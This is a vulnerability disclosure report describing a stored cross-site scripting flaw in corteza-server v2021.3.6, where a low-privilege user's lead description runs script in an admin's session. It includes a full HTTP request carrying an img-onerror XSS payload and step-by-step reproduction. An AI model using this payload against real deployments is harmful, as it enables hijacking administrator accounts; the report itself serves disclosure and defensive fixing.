Cross-site Scripting (XSS) - Stored in cortezaproject/corteza-server

Valid
Reported on Jun 10th 2021

💥 BUG

Stored xss bug against admin .

💥 TESTED VERSION

v2021.3.6

💥 IMPACT

lower level user can make xss attack against admin . Using xss bug attacker can execute arbitary javascript in victim account .
Thus lower level user can execute arbitary javascript in admin account using this xss and can change his role .

💥 STEP TO REPRODUCE

1. First from admin goto http://localhost:18080/admin/system/user and add a new user called user B .
Now give this user crm permission so that user B can create leads .

2. Now goto user B account and create a leads . Now update this leads and bellow request is sent to server

POST /api/compose/namespace/234475729176375299/module/234475730300383235/record/235001408024358915 HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjMzMDc2MDksInJvbGVzIjoiMiIsInNjb3BlIjoicHJvZmlsZSBhcGkiLCJzdWIiOiIyMzQ0NzYzMzYzOTQwMjI5MTUifQ.TQQZg4-C9195HxnwdFYWG_7dKiGGrtZCI-YwNtg4-kojdGcFK-35MrI4my7zQSMxn-ESClzplRVS2UxCbVgndg
Content-Length: 311
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/compose/ns/crm/pages/234475730518487043/record/235001408024358915/edit
Cookie: PHPSESSID=ktq9g4qb2bcocffq6dth0rv46l

{"values":[{"name":"Company","value":"sdfff"},{"name":"Description","value":"xss'><img src=x onerror=alert(11111)>"},{"name":"OwnerId","value":"234476336394022915"},{"name":"FirstName","value":"tettest"},{"name":"LastName","value":"test"},{"name":"RecordLabel","value":"tettest test"}],"records":[],"labels":{}}

Here in this postdata change Description field value to xss payload and forward the request .
Now leads will be updated .

3. Now goto admin account and open this leads and see javascript is executed in admin account .

💥 VIDEO

https://drive.google.com/file/d/1cuCyzOPtBKvVGNhSLexFgEx9Vgywfkox/view?usp=sharing

STUDY

https://owasp.org/www-community/attacks/xss/

https://en.wikipedia.org/wiki/Cross-site_scripting

https://www.acunetix.com/websitesecurity/cross-site-scripting/

https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/